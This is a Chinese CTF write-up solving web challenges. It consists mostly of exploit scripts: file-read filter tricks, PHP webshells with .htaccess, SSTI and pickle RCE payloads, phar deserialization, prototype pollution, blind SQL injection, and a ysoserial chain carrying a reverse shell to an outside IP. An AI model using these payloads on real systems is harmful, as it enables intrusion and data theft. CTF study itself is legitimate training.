Web
phpdest
require_once限制了只能包含一次
?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
得到的内容base64解码即可
EasyPHP
set_error_handler设置成了打印flag的函数
传一个数组让他报错就行了
SimpleRCE
aaa=show_source(str_rot13('/synt'));
funny_upload
php > echo base64_encode('<?php eval($_POST[0]);?>');
PD9waHAgZXZhbCgkX1BPU1RbMF0pOz8+
上传shell.png 内容就是这一串base64
然后上传.htaccess
AddType application/x-httpd-php .png
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/uploads/c47b21fcf8f0bc8b3920541abd8024fd/shell.png"
或者
import socket
import string
import requests
import time
def send(flag,length):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("2f6c5e3c-59b3-4753-bbc0-169208bca268.node4.buuoj.cn",81))
data = f'''POST / HTTP/1.1
Host: 2f6c5e3c-59b3-4753-bbc0-169208bca268.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------11586810801148743996859451927
Content-Length: {length}
Origin: http://2f6c5e3c-59b3-4753-bbc0-169208bca268.node4.buuoj.cn:81
Connection: close
Referer: http://2f6c5e3c-59b3-4753-bbc0-169208bca268.node4.buuoj.cn:81/
Cookie: token=eyJhZG1pbiI6dHJ1ZX0.YBEFFA._EzwGG57OrghZrI9PTJv5uNm0hI
Upgrade-Insecure-Requests: 1
-----------------------------11586810801148743996859451927
Content-Disposition: form-data; name="file"; filename=".htaccess"
Content-Type: image/png
<If "file('/flag')=~ /{flag}/">
ErrorDocument 404 "xux"
</If>
-----------------------------11586810801148743996859451927
Content-Disposition: form-data; name="1"
提交查询
-----------------------------11586810801148743996859451927--'''.replace('''
''','\\r\\n').split("\\r\\n")
for i in data:
temp = (i+"\r\n").encode()
s.send(temp)
length = 400
d = string.digits + string.ascii_lowercase + r"_-{}" + string.ascii_uppercase
flag = "Dest0g3{"
for i in range(100):
for t in d:
send(flag+t,length)
rep = requests.get("http://2f6c5e3c-59b3-4753-bbc0-169208bca268.node4.buuoj.cn:81/uploads/c47b21fcf8f0bc8b3920541abd8024fd/aaa").text
if 'xux' in rep:
flag+=t
length+=1
print(flag)
break
time.sleep(0.1)
EasySSTI
import requests
import re
url = "http://3fbb08f6-c806-4246-8e4c-b82d6b89a704.node4.buuoj.cn:81/login"
#a=pop
#b=_
#c=__globals__
#d=getitems
#e=os
#f=
#g=/
#flag=cat /flag
payload = '''{%set
a=dict(po=aa,p=aa)|join%}{%set
b=lipsum|string|list|attr(a)(18)%}{%set
c=(b,b,dict(glob=cc,als=aa)|join,b,b)|join%}{%set
d=(b,b,dict(ge=cc,tit=dd,em=aa)|join,b,b)|join%}{%set
e=dict(o=cc,s=aa)|join%}{%set
f=lipsum|string|list|attr(a)(9)%}{%set
g=(((lipsum|attr(c))|attr(d)(e))|string|list)|attr(a)(-8)%}{%set
flag=(dict(cat=aa)|join,f,g,dict(flag=aa)|join)|join%}{%set
h=(a,dict(en=aa)|join|join)|join%}{%set
i=dict(re=aa,ad=aa)|join%}{%set
z=(((lipsum|attr(c))|attr(d)(e))|string|list)|attr(a)(-5)%}{{lipsum|attr(c)|attr(d)(e)|attr(h)(flag)|attr(i)()}}'''
print(payload)
data = {
"username":payload,
"password":"xux"
}
rep = requests.post(url=url,data=data).text
print(rep)
middle
写opcode,比较简单,往栈中压一个列表即可
import pickle
import pickletools
import base64
import requests
# poc = '__import__("os").system("whoami")'
poc = b'''cconfig
backdoor
(]V__import__("os").popen("cat /flag.txt").read()
atR.'''
pickletools.dis(poc)
payload = base64.b64encode(poc)
print(payload)
rep = requests.post(url="http://2e0225b1-77e1-4b0c-8508-2b6b1b70bb4f.node4.buuoj.cn:81/home",data={"data":payload})
print(rep.text)
PharPOP
<?php
class tree{
public $name;
public $act;
}
class apple{
}
class air{
public $p;
}
$tree = new tree();
$air = new air();
$air->p->act = "SplFileObject";
$apple = new apple();
$apple->flag = "/fflaggg";
$tree->name = $apple;
$apple->xxx = $air;
echo serialize($tree);
$phar = new Phar("exp.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($tree);
$phar->addFromString("test.txt","test");
$phar->stopBuffering();
运行得到exp.phar
将2改为3来绕过throw new Error("start");
修改了phar文件后还要改一下签名
from hashlib import sha1
f = open("exp.phar",'rb').read()
s = f[:-28]
h = f[-8:]
newf = s + sha1(s).digest() + h
open("test.phar",'wb').write(newf)
得到test.phar
因为waf有对传入的数据进行检测,过滤了php
使用gzip对test.phar压缩一次
最终exp:
import requests
import re
url = "http://f7049b15-42dc-4336-b4a4-5c45454778f7.node4.buuoj.cn:81/"
def send():
rep = requests.post(url=url,data={
"1":'O:1:"D":10:{s:5:"start";s:1:"w";}',
'0':open("test.phar.gz",'rb').read()
}).text
print(rep)
def hack(file):
rep = requests.post(url=url,data = {
"1":'O:1:"D":10:{s:5:"start";s:1:"r";}',
"0":file
}).text
flag = re.findall(r"Dest0g3{.*?}",rep)[0]
print(flag)
#send()
#/tmp/915fa1e9fb473b8e2aff23ab61aa857a.jpg
hack("phar:///tmp/915fa1e9fb473b8e2aff23ab61aa857a.jpg")
ezip
新建一个shell.zip,其中含有一个1.php以及空的1.txt
1.php的内容为
<?php
eval($_POST[0]);
?>
打开010editor
将1.txt改为/////
上传shell.zip,提示解压失败,但1.php已经被解压
看了一下没权限读flag
NodeSoEasy
污染escapeFn即可
{"__proto__":{"client":true,"escapeFunction":"1; return global.process.mainModule.constructor._load('fs').readFileSync('/flag');","compileDebug":true}}
Really Easy SQL
import requests
import time
import string
url = "http://xxxxxx/index.php"
flag = "Dest0g3{"
for i in range(len(flag)+1,100):
max = 127
min = 32
while(abs(max-min)>0):
mid = (max+min)//2
data = {
#"username":f"admin',if((select(ascii(mid((group_concat(table_name)),{i},1)))from(information_schema.tables)where(table_schema=database()))>{mid},benchmark(100000,sha(1)),1))#",
#"username":f"admin',if((select(ascii(mid((group_concat(column_name)),{i},1)))from(information_schema.columns)where(table_name='flaggg'))>{mid},benchmark(100000,sha(1)),1))#",
"username":f"admin',if((select(ascii(mid((group_concat(cmd)),{i},1)))from(flaggg))>{mid},benchmark(900000,sha(1)),1))#",
"password":"admin"
}
d1 = time.time()
requests.post(url=url,data=data,proxies={"http":"127.0.0.1:8080"})
d2 = time.time()
if d2-d1>1:
min = mid + 1
else:
max = mid
time.sleep(0.5)
flag+=chr(max)
print(flag)
easysql
跟前一题的区别好像是多过滤了大于和小于号
把脚本改一下
import requests
import time
import string
url = "http://xxxxxx/index.php"
s = string.digits + string.ascii_lowercase + "-}{"
ss = [ord(i) for i in s]
flag = "Dest0g3{8be"
for i in range(len(flag)+1,100):
for t in ss:
data = {
"username":f"admin',if((select(ascii(mid((group_concat(cmd)),{i},1)))from(flaggg))={t},benchmark(900000,sha(1)),1))#",
"password":"admin"
}
d1 = time.time()
requests.post(url=url,data=data,proxies={"http":"127.0.0.1:8080"})
d2 = time.time()
if d2-d1>2:
flag+=chr(t)
print(flag)
time.sleep(0.5)
跑了半天QwQ
EzSerial
user处的数据是java序列化后的数据的base64编码后的结果
推测在user处传入的数据会被base64解码后反序列化
import requests
import os
import base64
url = "http://9c8254ad-4ea0-43ba-88a0-51a12b53ce9c.node4.buuoj.cn:81/admin/index.jsp"
payloadlist = []
for i in range(1,8):
payloadlist.append(f"CommonsCollections{i}")
for payload in payloadlist:
payload = 'java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ' + payload + ' "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Mi4xOTIuNDIuNDgvMjMzMyAwPiYx}|{base64,-d}|{bash,-i}" > payload'
os.system(payload)
exp = base64.b64encode(open("payload",'rb').read()).decode()
print(exp)
rep = requests.get(url=url,cookies={
"JSESSIONID":"CB0DE07D94F9C047F6D52BCEE88A73E8",
"user":exp
}).text
